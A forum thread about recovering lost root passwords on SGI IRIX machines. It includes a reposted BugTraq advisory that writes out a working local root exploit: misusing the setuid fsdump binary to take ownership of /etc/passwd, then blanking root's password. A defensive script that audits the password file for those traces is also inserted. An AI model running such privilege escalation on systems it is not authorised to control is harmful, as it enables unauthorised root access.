
Loss of Root password

Status
Not open for further replies.

stevea

MIS
May 3, 1999
US
I inherited an IRIX 5.3 system and do not have the root password. How can I backdoor into it to change it?
 
At the startup, select "system maintenance"
select install new software
select method (mostly CDrom)
wait until the installation tools are loaded
go to the admin options
select "start chrootedshell" (or something similar)
In the shell type passwd
fill in a new password, confirm it.

Root password is changed.
 
hehehe.. That won't work you know...

The trouble with 5.3 (I gather you're running an Indigo)
is that it doesn't have a password jumper on the mainboard (like Indy does).

Once your password is lost, you are too.. At least that's what I was told :(
 
So Stevea,

Did it work? Which method did you use? I actually have an Indy and forgot my password.

Was Sim3 saying to reload the system software?

Please reply to me w/any help.

 
Here's an article from BugTraQ regarding Irix 5.3 and its huge (imho) holes in fsdump. Keep in mind this requires you to have a regular (non-uid0) account that you can access. :)

Ok. Well, yet another IRIX 5.3 root exploit.
Of course, the major problem here is that IRIX allows users to
give away ownership of files. Without that, this could only
be used for changing the permissions on file so that you could read
and modify.

The system (an Indy):
IRIX irix 5.3 11091812 IP22 mips

irix% ls -la /var/rfindd/fsdump
---s--x--x 1 root sys 62032 Jul 25 1995 /var/rfindd/fsdump

What tipped me off that it was exploitable was the fact that it
was a protected suid binary (---s--x--x). I thought: if someone at
SGI is being careful to not let non-root users read the binary,
then it *must* be packed with holes... :)

So, I'm just a normal user today...

irix% id
uid=1799(csh) gid=500(users)

irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)

irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd

And now I've got root access...

irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted

All you have to do is edit off the garbage from the passwd file,
delete the encrypted root password and reset the perms on the passwd file.

irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#


That's it.
(Heck, you don't even have to remove the garbage from the passwd file.)

This can be used to access pretty much any file on the system
which is currently group owned...

fun, fun, fun until SGI takes the bugs away... ;-) (right)
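
The session quoted above leaves three traces in /etc/passwd: a non-root owner, fsdump's log output written into the file, and an empty root password field. A defender's check for those traces follows, as an added example that is not part of the thread; the function names and the sample root entry are constructed here.

```shell
#!/bin/sh
# Added example: flags the passwd-file artifacts visible in the post above.

# Content check: print one finding per suspicious line of passwd file $1.
audit_passwd_content() {
    awk -F: '
        # A real entry has exactly 7 colon-separated fields; program output
        # written into the file (or a blank line) does not.
        NF != 7 { printf "line %d: malformed entry (%d fields)\n", NR, NF; next }
        # An empty second field lets the account log in with no password.
        $2 == "" { printf "line %d: %s (uid %s) has an empty password field\n", NR, $1, $3 }
    ' "$1"
}

# Metadata check: the file should be owned by uid 0 and writable only by
# its owner. Parses `ls -ln` so it works without GNU stat.
audit_passwd_owner() {
    ls -ln "$1" | awk -v f="$1" '
        $3 != 0 { printf "%s: owned by uid %s, expected 0\n", f, $3 }
        substr($1, 6, 1) == "w" || substr($1, 9, 1) == "w" {
            printf "%s: writable by group or other (%s)\n", f, $1
        }
    '
}

# Constructed sample: the root entry is invented for illustration; the
# trailing lines copy the fsdump output shown in the post.
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
root::0:0:Super-User:/:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
EOF

audit_passwd_content "$sample"
audit_passwd_owner "$sample"
```

On a live system the same two functions would be pointed at /etc/passwd from a scheduled job, with any output treated as an alert.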

 
Intuity is a true scholar. Thanks, I am so happpyyy to have root control again ...



har har har
 
I am trying to install IRIX on an SGI Indy and it is asking me for a password at the maintenance screen when I press any of the buttons. Is there any way around that?


nosnam
 
I have a similar problem, IRIX 6.5.7. Have machine in front of me and account but lost root password. Do I have to reinstall operating system to regain control?
 